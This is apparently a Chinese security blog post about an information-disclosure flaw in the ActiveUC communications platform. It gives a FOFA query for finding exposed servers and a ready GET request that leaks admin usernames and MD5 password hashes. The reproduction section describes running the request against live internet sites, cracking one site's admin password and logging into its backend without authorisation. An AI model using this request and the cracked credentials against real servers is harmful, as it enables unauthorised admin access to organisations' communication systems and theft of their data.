网动统一通信平台(ActiveUC)接口iactiveEnterMeeting存在信息泄露漏洞
描述
网动统一通信平台是采用统一的通信平台,将VoIP电话系统、电子邮件等多种沟通方式融合的企业IT平台,接口/acenter/iactiveEnterMeeting.action?roomid=1&username=admin存在信息泄露漏洞,可能导致管理员密码泄露获取后台权限等。
fofa
title="网动统一通信平台(Active UC)"
POC
GET /acenter/iactiveEnterMeeting.action?roomid=1&username=admin HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Connection: keep-alive
Host:
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
漏洞复现
在fofa中搜索资产,共有163条数据匹配
以下为登录页面以及页面特征
直接访问漏洞接口:/acenter/iactiveEnterMeeting.action?roomid=1&username=admin
看返回页面什么信息泄露的内容,抓取当前页面的数据包查看
这里看的确是泄露了用户名和密码,并且密码像是MD5加密的,对该段字符串进行MD5解密
均以失败告终,不清楚是版本进行升级了还是这个站点自己对密码进行其他方式加密了,尝试一下其他站点
换了一个站点是可以解密的,可能之前的站点密码过于复杂或者是另一种类似MD5的加密方式
拿到密码和用户名,尝试进行登录
登录成功
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 地球OL攻略 —— 某应届生求职总结
· 周边上新:园子的第一款马克杯温暖上架
· Open-Sora 2.0 重磅开源!
· 提示词工程——AI应用必不可少的技术
· .NET周刊【3月第1期 2025-03-02】